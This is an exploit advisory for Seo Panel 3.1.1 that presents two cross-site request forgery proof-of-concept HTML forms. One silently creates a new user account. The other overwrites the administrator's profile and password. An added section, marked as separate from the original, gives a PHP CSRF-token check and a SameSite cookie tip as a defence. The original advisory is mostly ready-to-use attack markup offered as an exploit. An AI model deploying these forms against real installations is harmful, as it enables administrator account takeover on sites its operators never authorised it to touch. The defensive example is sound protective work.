
Seo Panel 3.1.1 Multiple CSRF Vulnerability

Author: Aboud-el, Published: 09-06-2012

####################################################################
.:. Author : Aboud-EL [aboud_el@hotmail.com]
.:. Script : http://www.seopanel.in//
.:. Tested On Demo : http://demos1.softaculous.com/Seo_Panel/login.php
.:. Gr34T$ T0 [AtT4CKxT3rR0r1ST]

####################################################################

===[ Exploit ]===

[1]Add User
============

<html>
<head>
<title>Seo Panel 3.1.1 [Add User]</title>
</head>
<body>
<H2>CSRF Add User By aboud-el</H2>
<form method="POST" name="form0" action="http://localhost/Seo_Panel/users.php">
<input type="hidden" name="sec" value="create"/>
<input type="hidden" name="userName" value="user"/>
<input type="hidden" name="password" value="123456789"/>
<input type="hidden" name="confirmPassword" value="123456789"/>
<input type="hidden" name="firstName" value="usr"/>
<input type="hidden" name="lastName" value="usr"/>
<input type="hidden" name="email" value="Email@hotmail.com"/>
</form>

</body>
</html>

[2]Edit Account Admin
======================

<html>
<head>
<title>Seo Panel 3.1.1 [Edit Account Admin]</title>
</head>
<body>
<H2>CSRF Edit Account Admin By aboud-el</H2>
<form method="POST" name="form0" action="http://localhost/Seo_Panel/users.php">
<input type="hidden" name="sec" value="updatemyprofile"/>
<input type="hidden" name="oldName" value="admin"/>
<input type="hidden" name="id" value="1"/>
<input type="hidden" name="oldEmail" value="Email@hotmail.com"/>
<input type="hidden" name="userName" value="admin"/>
<input type="hidden" name="password" value="123456789"/>
<input type="hidden" name="confirmPassword" value="123456789"/>
<input type="hidden" name="firstName" value="System"/>
<input type="hidden" name="lastName" value="Administrator"/>
<input type="hidden" name="email" value="Email@hotmail.com"/>
</form>

</body>
</html>
####################################################################
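
A defensive counterpart, added here as an example that is not part of the original advisory and is not Seo Panel's own code: both forms above contain only values a third-party page can predict, so a handler that also requires an unguessable per-session token rejects them. The function names, the `csrf_token` field and the array-based session below are assumptions for illustration.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical helpers, not Seo Panel's own code.
// Sessions are passed as arrays so the file runs from the CLI (php file.php);
// in a web request you would pass $_SESSION and $_POST instead.

/** Create the per-session token once and return it for embedding in forms. */
function csrf_issue(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256-bit, unguessable
    }
    return $session['csrf_token'];
}

/** True only if the POST carries the token stored in this session. */
function csrf_ok(array $post, array $session): bool
{
    $known = $session['csrf_token'] ?? '';
    $sent  = $post['csrf_token'] ?? '';
    if (!is_string($known) || $known === '' || !is_string($sent)) {
        return false; // no token issued, or field missing / array-valued
    }
    return hash_equals($known, $sent); // constant-time comparison
}

/** Gate for a handler such as users.php: reject before any `sec` action runs. */
function handle_post(array $post, array $session): int
{
    if (!csrf_ok($post, $session)) {
        return 403;
    }
    // ... dispatch on $post['sec'] ('create', 'updatemyprofile', ...) here
    return 200;
}

// Constructed demo data: field names mirror form [1] of the advisory.
$session = ['userid' => 1];
$token   = csrf_issue($session);

$forged = ['sec' => 'create', 'userName' => 'user', 'password' => '123456789'];
$guess  = $forged + ['csrf_token' => str_repeat('0', 64)];
$legit  = $forged + ['csrf_token' => $token];

foreach (['forged' => $forged, 'guessed token' => $guess, 'own form' => $legit] as $name => $post) {
    printf("%-14s -> HTTP %d\n", $name, handle_post($post, $session));
}
```

Setting `SameSite` on the session cookie is a useful second layer, not a replacement for the token check.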
